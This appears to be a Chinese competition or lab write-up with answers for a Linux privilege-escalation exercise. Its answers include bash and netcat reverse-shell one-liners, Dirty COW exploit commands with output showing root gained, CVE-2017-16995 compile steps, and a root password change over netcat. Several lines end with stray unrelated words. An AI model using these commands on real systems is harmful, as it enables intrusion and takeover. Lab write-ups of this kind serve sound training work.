任務環境說明:web
攻擊機:shell
物理機:Windows7ruby
物理機安裝工具1:Microsoft Visual Studio 2008bash
物理機安裝工具2:OllyICE服務器
虛擬機1:Ubuntu_Linux微信
虛擬機1安裝工具1:Python3/Python2架構
虛擬機1安裝工具2:GCCssh
虛擬機1安裝工具3:GDBtcp
虛擬機1安裝工具4:Netcat工具
虛擬機1用戶名:root,虛擬機1密碼:123456
虛擬機操做系統2:CentOS_Linux
虛擬機2安裝工具1:GCC
虛擬機2安裝工具2:GDB
虛擬機2用戶名:root,虛擬機2密碼:123456
靶機:
服務器場景1:WindowsServer
服務器場景1的FTP下載服務用戶名:anonymous
服務器場景2:LinuxServer_01
任務內容:
1.登陸服務器場景2的WebShell,經過相關手段打印當前系統相關信息(內核版本號、硬件架構、主機名稱和操做系統類型等,命令並不是查看文件),將操做命令做爲FLAG值提交;
答案:uname -a
#拿到的webshell後面的題目須要反彈,若是有NC直接nc -e /bin/bash,沒有的話也能夠直接經過bash反彈命令:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
2.根據操做命令回顯將內核版本信息做爲FLAG值提交;
操做命令:uname -r
3.經過相關手段對服務器場景2上傳提權文件,將上傳成功提示單詞所有做爲FLAG值提交;
不清楚是什麼提權方式,沒法做答;
疑似:髒牛、CVE-2017-16995....
髒牛:
www-data@medidor2:/tmp$gcc -Wall -o hello dirtycow-mem.c -ldl -lpthread www-data@medidor2:/tmp$ ls hello www-data@medidor2:/tmp$ chmod +x hello www-data@medidor2:/tmp$ id uid=33(www-data) gid=33(www-data) groups=33(www-data) www-data@medidor2:/tmp$ ./hello [*] range: b7573000-b7716000] [*] getuid = b762bd10 [*] mmap 0xb73cb000 [*] exploiting (patch) [*] patched (madviseThread) [*] patched (procselfmemThread) root@medidor2:/tmp# [*] exploiting (unpatch) [*] unpatched: uid=33 (madviseThread) [*] unpatched: uid=33 (procselfmemThread) root@medidor2:/tmp# id uid=0(root) gid=0(root) groups=0(root)
CVE-2017-16995直接編譯gcc -o exp exp.c便可;
髒牛:gcc -pthread dirty.c -o dirty -lcrypt編譯好執行便可,使用髒牛須要注意的是對/etc/passwd進行備份,而後對/etc/passwd進行重寫,修改帳戶權限;
4.在攻擊機虛擬機1經過NC進行監聽模式,輸出交互信息或報錯信息,而且監聽8081端口,將命令做爲FLAG值提交;
參考命令:nc -lvvp 8081
5.從攻擊機虛擬機1對服務器場景2經過相關手段進行NC鏈接,將成功回顯後結果的正數第三排第四個單詞做爲FLAG值提交;
參考命令:netcat ip port
6.從攻擊機虛擬機1對服務器場景2經過相關手段進行NC成功鏈接後,經過相關命令修改root密碼,將回顯最後一行後三個單詞做爲FLAG值提交;
參考命令:經過NC修改Linux密碼的命令:echo qqadminssh | passwd --stdin root
7.修改密碼後,查看/root/flag.txt文件,將回顯最後一行最後兩個單詞做爲FLAG值提交;
參考命令:cat /root/flag.txt
8.對當前用戶進行提權,提權成功後,再次查看/root/flag.txt,將回顯內容後兩個單詞做爲FLAG值提交;
參考命令:cat /root/flag.txt
若是你以爲這篇文章對你有用你能夠經過掃描下面的二維碼進行打賞。
——>微信<—— ——>支付寶<——